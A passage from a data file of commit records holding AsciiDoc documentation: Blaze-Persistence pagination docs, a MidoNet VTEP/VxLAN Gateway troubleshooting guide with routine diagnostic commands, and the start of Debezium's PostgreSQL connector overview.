https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/248[#248],\nhttps:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/249[#249] and https:\/\/github.com\/Blazebit\/blaze-persistence\/issues\/255[#255]\n\nTIP: You can inspect the query strings by using link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageCountQueryString()[`getPageCountQueryString()`],\nlink:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html#getPageIdQueryString()[`getPageIdQueryString()`] and link:{core_doc}\/persistence\/Queryable.html#getQueryString()[`getQueryString()`]\n\n[[anchor-offset-pagination]]\n=== Offset pagination\n\nAs already laid out in the <<pagination,introduction>>, pagination works on an ordered set of elements\/rows.\nOffset pagination basically looks at the ordered set from left to right and counts elements until the count reaches `firstResult`.\nFrom that point on elements are collected until `maxResults` of elements have been collected or no more elements are available.\n\nThis basically means that the `OFFSET` i.e. `firstResult` part forces a DBMS to actually determine an element\/row is visible for a transaction and then _ignore_\/_skip_ it.\nThe bigger the `firstResult` value, the more resources the DBMS has to waste for _skipping_ elements\/rows.\nThis essentially means that when employing offset pagination, accessing the latter pages will become more and more expensive.\nIn order for this approach to be actually usable with larger data sets, a DBMS index that can be used for the ordering is required to avoid constantly loading and sorting data.\nIn addition to that, the DBMS should have enough RAM to keep the index fully in-memory to avoid costly disk fetches.\n\nAlthough offset pagination works in every case, it should be avoided if possible because of the performance implications.\nAs you will see in the <<anchor-keyset-pagination,keyset pagination part>> there is a more efficient approach to pagination that almost uses the same API.\n\nThe following example illustrates the usage and what happens behind the scenes\n\n[source, java]\n----\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .fetch(\"kittens\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(5, 5)\n .getResultList();\n----\n\nExecutes the following queries\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*)\nFROM Cat cat\n----\n\nNote that the *ID query* is necessary because of the join fetched collection `kittens`\n\n[.ID query]\n[source,sql]\n----\nSELECT cat.id\nFROM Cat cat\nORDER BY cat.id ASC NULLS LAST\n--LIMIT 1 OFFSET 1\n----\n\n[.Object query]\n[source,sql]\n----\nSELECT cat\nFROM Cat cat\nLEFT JOIN FETCH cat.kittens kittens_1\nWHERE cat.id IN :idParams\nORDER BY cat.id ASC NULLS LAST\n----\n\n[[anchor-keyset-pagination]]\n=== Keyset pagination\n\nKeyset pagination is a way to efficiently paginate or scroll through a large data set by querying for elements that come before or after a reference point.\nThe idea of a keyset is, that every tuple can be uniquely identified by that keyset. So a keyset essentially is a reference point of a tuple in a data set ordered by keysets.\nKeyset pagination in contrast to offset pagination makes efficient use of the ordering property of the data set.\nBy remembering the highest and lowest keysets of a page, it is possible to query the previous and next pages efficiently.\n\nA keyset in terms of query results consists of the values of the `ORDER BY` expressions of a tuple.\nIn order to satisfy the uniqueness constraint, it is generally a good idea to use an entity's id as last expression in the `ORDER BY` clause.\n\nNOTE: Currently the entity id is the *only* possible expression that satisfies the uniqueness constraint.\n\nKeyset pagination just like offset pagination requires index support on the DBMS side to work efficiently. A range-scan enabled index like provided by a b-tree index is required for keyset pagination to work best.\nIn contrast to offset pagination, an index does not have to be traversed like a list in order to _ignore_\/_skip_ a certain amount of elements\/rows. Instead, a DBMS can make use of the structure of the index\nand traverse it in `O(log N)` as compared to `O(N)` to get to the `firstResult`. This characteristic makes keyset pagination especially useful for accessing latter pages.\n\nTIP: Don't allow too many different sort combinations as every combination requires a custom index to work efficiently.\n\nOne of the obvious requirements for keyset pagination to work, is the need for a reference point i.e. a keyset from which point on the next or previous elements should be queried.\n\nThe API in {projectname} tries to allow making use of keyset pagination in a transparent and easy manner without compromises.\n\n[source, java]\n----\n\/\/ In the beginning we don't have a keyset page\nKeysetPage oldPage = null;\nPagedList<Cat> page2 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(oldPage, 5, 5) #<1>\n .getResultList();\n\n\/\/ Query the next page with the keyset page of page2\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 10, 5) #<2>\n .getResultList();\n\n\/\/ Query the previous page with the keyset page of page2\nPagedList<Cat> page1 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page(page2.getKeysetPage(), 0, 5) #<3>\n .getResultList();\n----\n<1> The oldPage in this case is `null`, so internally it falls back to offset pagination\n<2> When querying the _next_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getHighest()[upper bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n<3> When querying the _previous_ page of `page2`, it can use the link:{core_doc}\/persistence\/KeysetPage.html#getLowest()[lower bound] of the link:{core_doc}\/persistence\/PagedList.html#getKeysetPage()[keyset page]\n\nSince we are not fetching any collections, the ID query is avoided. For brevity, we skip the count query.\nSo let's look at the object queries generated\n\n[.Object query 1]\n[source,sql]\n----\nSELECT cat, cat.id #<1>\nFROM Cat cat\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5 OFFSET 5\n----\n<1> The expression `cat.id` is for constructing the keyset and contains all expressions of the `ORDER BY` clause\n\nAs you can see, nothing fancy, except for the additional select that is used for extracting the keyset.\n\n[.Object query 2]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday > :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id > :_keysetParameter_1\n)\nORDER BY cat.birthday ASC NULLS LAST, cat.id ASC NULLS LAST\n--LIMIT 5\n----\n\nThis time the query made efficient use of the keyset by filtering out elements\/rows that come before the reference point\n\n[.Object query 3]\n[source,sql]\n----\nSELECT cat, cat.id\nFROM Cat cat\nWHERE cat.birthday < :_keysetParameter_0 OR (\n cat.birthday = :_keysetParameter_0 AND\n cat.id < :_keysetParameter_1\n)\nORDER BY cat.birthday DESC NULLS FIRST, cat.id DESC NULLS FIRST\n--LIMIT 5\n----\n\nBefore the query filtered out elements\/rows that came *before* the reference point, this time it does the opposite. It filters out elements\/rows coming *after* the reference point.\nAnother interesting thing to notice, the ordering was reversed too. This has the effect that the DBMS can traverse the index backwards and essentially is how keyset pagination works.\nThe ordering is reversed again in-memory, so you don't notice anything of these details.\n\nNote that in the following situations, the implementation automatically falls back to offset pagination\n\n* The keyset is invalid i.e. it is `null`\n* The ordering of the query changed\n* The page to navigate to is arbitrary i.e. not the next or previous page of a `keysetPage`\n\nTo be able to make use of keyset pagination either via the link:{core_doc}\/persistence\/PaginatedCriteriaBuilder.html[`PaginatedCriteriaBuilder`] API or the <<keyset-pagination-support,manual keyset filter API>>,\nthe link:{core_doc}\/persistence\/KeysetPage.html[`KeysetPage`] or the respective link:{core_doc}\/persistence\/Keyset.html[`Keyset`] elements have to be preserved across page requests.\nApplications that can retain state between requests(i.e. via a session) can just preserve the `KeysetPage` object itself. Applications that try to avoid server side state have to serialize and deserialize the state somehow.\n\nSince the keyset state is available through link:{core_doc}\/persistence\/Keyset.html#getTuple()[getter methods], it shouldn't be too hard to do the serialization and deserialization.\nWhen implementing a custom `Keyset`, the `equals()` and `hashCode()` contracts have to make use of just the tuple. A custom `KeysetPage` implementation has to provide access to the lowest and highest keysets,\nas well as the `firstResult` and `maxResults` values used for querying that page.\n\n[[anchor-navigate-entity-page]]\n=== Navigate to entity page\n\nThe navigation to the page on which an entity with a specific id is involves finding out the position of the entity.\n{projectname} offers a custom function named <<page-position,`PAGE_POSITION`>> which determines the absolute position of an entity in an ordered set.\n\n[source, java]\n----\nCat knownCat = \/\/...\nPagedList<Cat> page3 = cbf.create(em, Cat.class)\n .orderByAsc(\"birthday\")\n .orderByAsc(\"id\") \/\/ unique ordering is required for pagination\n .page((Object) knownCat.getId(), 3) #<1>\n .getResultList();\n----\n<1> If your id type is a primitive `int`, you must cast to `Object` or `Integer` to use the right method\n\n[.Count query]\n[source,sql]\n----\nSELECT COUNT(*), FUNCTION('PAGE_POSITION',(\n SELECT _page_position_cat.id\n FROM Cat _page_position_cat\n GROUP BY _page_position_cat.id, _page_position_cat.birthday\n ORDER BY _page_position_cat.birthday DESC NULLS FIRST, _page_position_cat.id DESC NULLS FIRST\n), :_entityPagePositionParameter)\nFROM Cat cat\n----\n\nThe count query contains the page position determination logic. It essentially passes an ID query as subquery to the `PAGE_POSITION` function.\nThe concrete SQL implementation of that function depends on the DBMS, but they all follow the same main idea.\nWrap the ID query and count the row numbers. In another wrapper around that, filter for the row with the matching id and return the row number as position.\nThe element\/row number of the first element on that page is calculated and used as `firstResult`. Apart from this speciality, the rest of the query is just like a normal offset pagination query.\n\n=== Limitations\n\nSince the `PaginatedCriteriaBuilder` API can only paginate on entity level, the results are implicitly grouped by id and therefore distinct.\nBecause of that, the usage of `distinct()` or `groupBy()` on a `PaginatedCriteriaBuilder` is disallowed and will result in an exception.\n\nIf these limitations are not ok for your use case, you will have to implement a custom pagination strategy via `setFirstResult()` and `setMaxResults()`.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53038ef86e8c69132b98643575bb8bdcb1cd264c","subject":"Add troubleshooting for VxLAN Gateway","message":"Add troubleshooting for VxLAN Gateway\n\nChange-Id: I649d28ef28248555a70cb8970f062a33652f7916\nSigned-off-by: Galo Navarro <993a0c35b28faad02772940a5764c74e22075164@midokura.com>\nSigned-off-by: Jan Hilberath <14e793d896ddc8ca6911747228e86464cf420065@hilberath.de>\n","repos":"midonet\/midonet-docs,yantarou\/midonet-docs,yantarou\/midonet-docs,yantarou\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs,midonet\/midonet-docs","old_file":"docs\/operation-guide\/src\/vxlan\/section_troubleshooting.adoc","new_file":"docs\/operation-guide\/src\/vxlan\/section_troubleshooting.adoc","new_contents":"[[vxgw_troubleshooting]]\n= Troubleshooting VTEP\/VXGW configuration\n\nVTEP deployments have a relatively large number of moving pieces and\npotential failure points. This guide will focus on troubleshooting\nMidoNet and the integration with the VTEP. For specifics on the\nconfiguration of the logical switch please refer to your vendor's\ndocumentation.\n\n*Is the MidoNet API able to connect to the VTEP*\n\nAfter following the procedure to add a VTEP as described in xref:cli_add_vtep[],\nthe expected output should be as follows:\n\n[source]\nmidonet> vtep add management-ip 119.15.120.123 management-port 6633 tunnel-zone tzone0\nmanagement-ip 119.15.120.123 management-port 6633 tunnel-zone tzone0 connection-state CONNECTED\n\nThe same output should appear for VTEPs already added to MidoNet.\n\nNote that the state is CONNECTED. An ERROR state will indicate that the\nVTEP's management IP is unreachable from the MidoNet API.\n\n*Is the VTEP well configured?*\n\nA typical reason for the VTEP being on ERROR state is a misconfiguration\nof the VTEP OVDSB instance. You can verify this by executing the\nfollowing command on the console:\n\n[source]\novsdb-client dump hardware_vtep\n\nScroll down to the Physical_Switch table, which will look like this:\n\n[source]\n----\nPhysical_Switch table\n_uuid description management_ips name ports switch_fault_status tunnel_ips\n------------------------------------ ------------------- ---------------- ----------- -------------------------------------- ------------------- ------------\n3647f020-9ecf-4854-8f75-9011b8c9996a \"VTEP DESCRIPTION\" [\"192.168.2.14\"] \"VTEP NAME\" [698ede89-31f8-4797-a885-1b2dd4c585e3] [] [\"10.0.0.1\"]\n----\n\nVerify that an entry exists, and the management_ips and tunnel_ips\nfields correspond to the physical configuration. The management IP is\nthe one you'll be using on the \"vtep add\" command. The tunnel IP is not\nrelevant at this point, however, MidoNet expects that a value is present\nin this field.\n\n*Is the OVSDB instance running and accessible?*\n\nIf the MidoNet API shows an ERROR on the VTEP list, and your\nconfiguration is correct, you should verify that the OVSDB instance is\nlistening on the same management-port that you're specifying in the vtep\nadd call.\n\nFrom the host running the MidoNet REST API (and Coordinator) try to\nestablish a Telnet connection to the VTEP management interface IP and\nport, assuming these are 192.168.2.13 and 6632:\n\n[source]\ntelnet 192.168.2.13 6632\n\nIf the connection is successful, you should see the following output:\n\n[source]\nTrying 192.168.2.13..\nConnected to localhost.\nEscape character is '^]'.\n\nThis means that we have a TCP socket listening on the right port.\nWe can now verify that the OVSDB is responsive. If this is not the\ncase, then check your switch manual to listen for connections at the\nselected TCP port.\n\nIf the output was correct, then enter the following input into the\nconsole:\n\n[source]\n{\"method\":\"list_dbs\",\"id\":\"list_dbs\",\"params\":[]}\n\nThe desired output is:\n\n[source]\n{\"id\":\"list_dbs\",\"result\":[\"hardware_vtep\"],\"error\":null}\n\nThe content of the brackets after \"result\" may vary, but we must see a\n\"hardware_vtep\", indicating that there is a VTEP schema on this instance\nof the OVSDB. If you fail to see this output, the VTEP likely doesn't\ncontain a hardware_vtep schema in its OVSDB instance. Refer to your\nswitch documentation for instructions to configure it.\n\n*VTEP and bindings are added but no traffic goes through*\n\nVerify first that you enabled the VxLAN Gateway Service in the MidoNet\nAPI. This service is not enabled by default, but is required to\nconfigure the VTEP and synchronize state. Open the MidoNet API\nconfiguration file:\n\n[source]\nvi \/usr\/share\/midonet-api\/WEB-INF\/web.xml\n\nAnd scroll down until you find this section:\n\n[source]\n<!-- VXLAN gateway configuration -->\n<context-param>\n <param-name>midobrain-vxgw_enabled<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n\nNote that the value is set to \"true\" in all MidoNet API instances that\nyou want to participate in VxLAN Gateway coordination.\n\n*Verify that the VxLAN Gateway service is started*\n\nThe VxLAN Gateway service may be enabled in several MidoNet API\ninstances. All of them will coordinate through the Network State\nDatabase (NSDB) to elect a leader that will perform all coordination\ntasks. When a MidoNet API instance takes over leadership the following\nINFO message is displayed in the logs (\/var\/log\/tomcat\/catalina.out):\n\n[source]\n\"I am the VxLAN Gateway leader! \\o\/\"\n\nIf another instance is already a leader, all other instances will\ndisplay the following INFO message:\n\n[source]\n\"I am no longer VxLAN Gateway leader, going passive\"\n\nAt least one instance of the MidoNet API should display the positive\nmessage indicating that it became the VxLAN Gateway Leader. This is the\ninstance that should be watched for further log messages.\n\n*Verify that the VxLAN Gateway leader picks up VTEPs and Networks*\n\nVxLAN Gateway services will scan all the Neutron networks in MidoNet's\nNSDB and proceed to monitor those that are bound to any VTEPs.\n\nWhenever a Neutron network is bound to a VTEP, the following message\nwill appear in the INFO logs. Note that all log messages relevant for a\ngiven Neutron network will be tagged with the appropriate UUID:\n\n[source]\nINFO c68fa502-62e5-4b33-9f2f-d5d0257deb4f - Successfully processed update\n\nYou can filter updates relevant to specific networks by editing:\n\n[source]\nvi \/usr\/share\/midonet-api\/WEB-INF\/classes\/logback.xml\n\nFollow the instructions detailed in this file to enable different\nprocesses in the coordinator. For brevity, log messages mentioned\nbelow will omit the Network UUID tag.\n\nAs mentioned above, you should be seeing a message like the following\nfor each Neutron network:\n\n[source]\nNetwork <NETWORK_UUID> is now part of a VxLAN Gateway\n\nFailures during this phase typically indicate errors accessing the\nNSDB, for example:\n\n[source]\nCannot retrieve network state\n\nThe MidoNet controller will WARN in the logs whenever a recoverable\nerror is found, and try to restore connectivity to the NSDB. Non\nrecoverable errors will be marked as ERROR.\n\nIf the logs show problems connecting to the NSDB verify that the NSDB is\nactive, and MidoNet API is successfully able to access it.\n\n*Verify that the MidoNet coordinator synchronizes MAC with the VTEPs*\n\nAfter fetching Neutron network configuration from the NDSB, the MidoNet\nAPI logs should display the following messages (note that they may\nappear mixed with other messages):\n\n[source]\nStarting to watch MAC-Port table in <NEUTRON_UUID>\nStarting to watch ARP table in <NEUTRON_UUID>\nNetwork state now monitored\n\nThese indicate that the MidoNet coordinator is monitoring the network's\nstate, which will be synchronized to the VTEP.\n\n*Verify that the MidoNet coordinator connects to the VTEP(s)*\n\nThe MidoNet coordinator will also bootstrap a process to exchange state\namong the network, and all VTEPs with port-vlan pairs bound to it. When\nthe controller detects any port-vlan pair in a new VTEP, it'll show the\nfollowing message (assuming management ip and management port are\n192.168.2.13 and 6632):\n\n[source]\nBindings to new VTEP at 192.168.2.13:6632\n\nAt this point it will ensure that a connection is stablished to this\nVTEP's management IP and that the bindings configured through the\nMidoNet REST API are correctly reflected in the VTEP. Normal output will\nlook like this (note that they may appear mixed with other messages):\n\n[source]\nConsolidate state into OVSDB for <VXLAN GATEWAY DESCRIPTION>\nLogical switch <LOGICAL_SWITCH_NAME> exists: ..\nSyncing port\/vlan bindings: <PORT_VLAN PAIRS>\n\nIf the coordinator reports any errors connecting to the VTEP it will\nautomatically try to connect, but you should verify that the VTEP is\nup and accessible.\n\nFollowing a successful consolidation of state, MidoNet will start the\nsynchronization of MACs and ARP entries:\n\n[source]\nJoining <VXLAN_GATEWAY_DESCRIPTION> and pre seeding <NUMBER> remote MACs\nEmitting snapshot with <NUMBER> local MACs\nAdvertise unknown-dst to receive flooded traffic ..\n\nConnection errors to the VTEP are possible at this point, but should be\nhandled gracefully by the coordinator.\n\nIf MidoNet finds a non recoverable error, the following WARN will be\ndisplayed (assuming same management port and id as above):\n\n[source]\nFailed to bootstrap VTEP at 192.168.2.13:6632\n\nThe MidoNet coordinator will ignore this Neutron network until it's\nupdated again. It should however be able to continue operating with all\nother configured networks.\n\n*Verify that the MidoNet coordinator synchronizes state*\n\nIf no errors are displayed up to here, edit the logback.xml file\nmentioned above and enable DEBUG logs in the vxgw processes:\n\n[source]\n<!-- <logger name=\"org.midonet.vxgw\" level=\"DEBUG\" \/> -->\n\nRemove the `<!--` and `-->` tags to enable this configuration and wait for a\nfew seconds until the API logs start showing DEBUG messages. Choose\nTRACE instead of DEBUG for more exhaustive information (none will be too\nverbose to have a significant performance impact).\n\nMessages like the following show that the MidoNet coordinator is\nsuccessfully exchanging MACs among Midonet and VTEPs.\n\n[source]\nTRACE c68fa502-62e5-4b33-9f2f-d5d0257deb4f - Learned: MacLocation { logicalSwitchName=mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f, mac=96:8f:e8:12:33:55, vxlanTunnelEndpoint=192.168.2.16 }\n\nThis message indicates that an update about the given MAC was detected\non the Logical Switch that belongs to Neutron network\nc68fa502-62e5-4b33-9f2f-d5d0257deb4f. In this case, the\nvxlanTunnelEndpoint was 192.168.2.16, indicating that the MAC can be\nfound at that tunnel endpoint. The removal of a MAC from a port can be\nidentified because the vxlanTunnelEndpoint=null (that can be read as\n\"the MAC is at no port\").\n\n*Verify that VxLAN tunnels are being established*\n\nIf the coordinator is working normally, but traffic is still not\nflowing, you should verify that the VTEPs and MidoNet hosts are able to\nstablish VxLAN tunnels successfully.\n\nWhile keeping a ping active from the VM to the server you're trying to\ncommunicate with, log in to the MidoNet compute hosting the VM that you're\ntrying to communicate with a server on the VTEP. Run the following\ncommand:\n\n[source]\ntcpdump -leni any port 4789\n\nAssuming that the MidoNet compute is 192.168.2.14, and the VTEP's tunnel\nIP is 192.168.2.17, the output should be similar to this (depending on\nyour tcpdump version):\n\n[source]\n15:51:28.183233 Out fa:16:3e:df:b7:53 ethertype IPv4 (0x0800), length 94: 192.168.2.14.39547 > 192.168.2.17.4789: VXLAN, flags [I] (0x08), vni 10012\naa:aa:aa:aa:aa:aa > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 10.0.0.1 tell 10.0.0.10, length 28\n15:51:28.186891 In fa:16:3e:52:d8:f3 ethertype IPv4 (0x0800), length 94: 192.168.2.17.59630 > 192.168.2.13.4789: VXLAN, flags [I] (0x08), vni 10012\ncc:dd:ee:ee:ee:ff > aa:aa:aa:aa:aa:aa, ethertype ARP (0x0806), length 42: Reply 10.0.0.10 is-at cc:dd:ee:ee:ee:ff\n\nThe first line shows that the MidoNet Agent (192.168.2.14) is emitting a\ntunnelled packet towards the VTEP (192.168.2.17:4789), using 10012 as\nVNID. The encapsulated packet is shown on the second line, and\ncorresponds to an ARP REQUEST from a VM with ip 10.0.0.10 regarding\nserver 10.0.0.1.\n\nIn this example, the VTEP is responding correctly on the third line,\nshowing a return packet with the same VNID.\n\nThe same example can be applied in reverse on the VTEP. A ping from the\nphysical server connected to the VTEP should generate a tunnelled packet\ntowards a MidoNet Agent, and receive similar return packets.\n\n*The MidoNet agent is not emitting traffic*\n\nVerify the VXLAN-related options in the \/etc\/midolman\/midolman.conf\nfile. Examine the MidoNet Agent logs in debug mode and look for\nsimulations on the Neutron network that might be dropping packets, or\nthrowing errors on the simulation.\n\n*The VTEP is not emitting traffic on the tunnel*\n\nEnsure that the VTEP configuration reflects the bindings configured\nthrought the MidoNet REST API. Use the following command to list the\nVTEPs present in the switch:\n\n[source]\nvtep-ctl list-ls\n\nThis will display all Logical Switches present in the switch. If you\nbound a Neutron network with UUID c68fa502-62e5-4b33-9f2f-d5d0257deb4f,\nthen you should see the following item in the list:\n\n[source]\nmn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nNow list the bindings on the port that you used to create the port-vlan\nbinding in the midonet-cli. Let's assume we have port1, and created a\nbinding with port1 and vlan 93. The expected output would be:\n\n[source]\nvtep-ctl list-bindings <VTEP_NAME> port1\n0093 mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nYou can find out the VTEP_NAME using the \"vtep-ctl list-ps\" command.\n\nIf any of these outputs is not as expected, the MidoNet coordinator is\nmost likely not being able to consolidate the configuration from the\nNSDB. Verify the MidoNet API logs and locate the relevant errors in\norder to correct them.\n\n*Verify that MACs are being synchronized correctly to the VTEP*\n\nFinally, you can list the local and remote MACs present in the VTEP's\ndatabase:\n\n[source]\nvtep-ctl list-local-macs mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nThis should show all the MACs learned by the VTEP from traffic observed\non local ports. If the local server is correctly configured, you will\ntypically see the server's MAC here.\n\nThe following command will display the remote MACs:\n\n[source]\nvtep-ctl list-remote-macs mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nThe list here will show MACs in MidoNet VMs or other VTEPs, which are\ninjected by the MidoNet coordinator.\n\nIf any of these steps don't show an expected output, the synchronisation\nprocesses may be failing. Inspect the MidoNet API logs for more\ndetails.\n","old_contents":"[[vxgw_troubleshooting]]\n= Troubleshooting VTEP\/VXGW configuration\n\nYou can use this information for troubleshooting the VXGW\/VTEP:\n\n* Try to establish a Telnet connection to the VTEP management interface IP and\nport. You should be able to connect successfully if the VTEP has been properly\nconfigured.\n\n* You can examine the MAC-table of the Neutron network. MAC entries pointing to\nvxlan ports indicate MAC addresses that are \"local\" to the vxlan port's VTEP.\n\n* You can examine the ARP-suppression-table of the Neutron network. IP-mac\nentries in that table (if they point to MACs that are local to MidoNet) are used\nto populate MAC suppression tables in the VTEP.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e161077455fd625a847b27b357a16e2036f45520","subject":"DBZ-3338 Mirror downstream codeblock fix. Other consistency edits.","message":"DBZ-3338 Mirror downstream codeblock fix. Other consistency edits.\n","repos":"jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/postgresql.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/postgresql.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-postgresql\"]\n= {prodname} connector for PostgreSQL\n\n:context: postgresql\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 9.6, 10, 11, 12 and 13 are supported.\nendif::community[]\nifdef::product[]\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 10, 11, 12 and 13 are supported.\nendif::product[]\n\nThe first time it connects to a PostgreSQL server or cluster, the connector takes a consistent snapshot of all schemas. After that snapshot is complete, the connector continuously captures row-level changes that insert, update, and delete database content and that were committed to a PostgreSQL database. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. Applications and services consume data change event records from that topic.\n\nifdef::product[]\nInformation and procedures for using a {prodname} PostgreSQL connector is organized as follows:\n\n* xref:overview-of-debezium-postgresql-connector[]\n* xref:how-debezium-postgresql-connectors-work[]\n* xref:descriptions-of-debezium-postgresql-connector-data-change-events[]\n* xref:how-debezium-postgresql-connectors-map-data-types[]\n* xref:setting-up-postgresql-to-run-a-debezium-connector[]\n* xref:deployment-of-debezium-postgresql-connectors[]\n* xref:monitoring-debezium-postgresql-connector-performance[]\n* xref:how-debezium-postgresql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} PostgreSQL connector\n\/\/ ModuleID: overview-of-debezium-postgresql-connector\n[[postgresql-overview]]\n== Overview\n\nPostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-explanation.html[_logical decoding_] feature was introduced in version 9.4. It is a mechanism that allows the extraction of the changes that were committed to the transaction log and the processing of these changes in a user-friendly manner with the help of an link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[_output plug-in_]. The output plug-in enables clients to consume the changes.\n\nThe PostgreSQL connector contains two main parts that work together to read and process database changes:\n\n[[postgresql-output-plugin]]\nifdef::community[]\n* A logical decoding output plug-in. You might need to install the output plug-in that you choose to use. You must configure a replication slot that uses your chosen output plug-in before running the PostgreSQL server. The plug-in can be one of the following:\n** link:https:\/\/github.com\/debezium\/postgres-decoderbufs[`decoderbufs`] is based on Protobuf and maintained by the {prodname} community.\n** link:https:\/\/github.com\/eulerto\/wal2json[`wal2json`] is based on JSON and maintained by the wal2json community.\n** `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. It is maintained by the PostgreSQL community, and used by PostgreSQL itself for link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present so no additional libraries need to be installed. The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the chosen logical decoding output plug-in. It uses PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_], by means of the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_]\nendif::community[]\n\nifdef::product[]\n* `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. This is the only supported logical decoding output plug-in in this {prodname} release. This plug-in is maintained by the PostgreSQL community, and used by PostgreSQL itself for link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present so no additional libraries need to be installed. The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the logical decoding output plug-in by using PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_] and the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_].\nendif::product[]\n\nThe connector produces a _change event_ for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nPostgreSQL normally purges write-ahead log (WAL) segments after some period of time. This means that the connector does not have the complete history of all changes that have been made to the database. Therefore, when the PostgreSQL connector first connects to a particular PostgreSQL database, it starts by performing a _consistent snapshot_ of each of the database schemas. After the connector completes the snapshot, it continues streaming changes from the exact point at which the snapshot was made. This way, the connector starts with a consistent view of all of the data, and does not omit any changes that were made while the snapshot was being taken.\n\nThe connector is tolerant of failures. As the connector reads changes and produces events, it records the WAL position for each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the WAL where it last left off. This includes snapshots. If the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n[[postgresql-limitations]]\n[IMPORTANT]\n====\nThe connector relies on and reflects the PostgreSQL logical decoding feature, which has the following limitations:\n\n* Logical decoding does not support DDL changes. This means that the connector is unable to report DDL change events back to consumers.\n* Logical decoding replication slots are supported on only `primary` servers. When there is a cluster of PostgreSQL servers, the connector can run on only the active `primary` server. It cannot run on `hot` or `warm` standby replicas. If the `primary` server fails or is demoted, the connector stops. After the `primary` server has recovered, you can restart the connector. If a different PostgreSQL server has been promoted to `primary`, adjust the connector configuration before restarting the connector.\n\n{link-prefix}:{link-postgresql-connector}#postgresql-when-things-go-wrong[ Behavior when things go wrong] describes what the connector does when there is a problem.\n====\n\n[IMPORTANT]\n====\n{prodname} currently supports databases with UTF-8 character encoding only.\nWith a single byte character encoding, it is not possible to correctly process strings that contain extended ASCII code characters.\n====\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-postgresql-connectors-work\n\/\/ Title: How {prodname} PostgreSQL connectors work\n[[how-the-postgresql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} PostgreSQL connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-postgresql-connectors-perform-database-snapshots[]\n* xref:how-debezium-postgresql-connectors-stream-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records[]\n* xref:metadata-in-debezium-postgresql-change-event-records[]\n* xref:debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: creating-debezium-postgresql-user\n\/\/ Title: Security for PostgreSQL connector\n[[postgresql-security]]\n=== Security\n\nTo use the {prodname} connector to stream changes from a PostgreSQL database, the connector 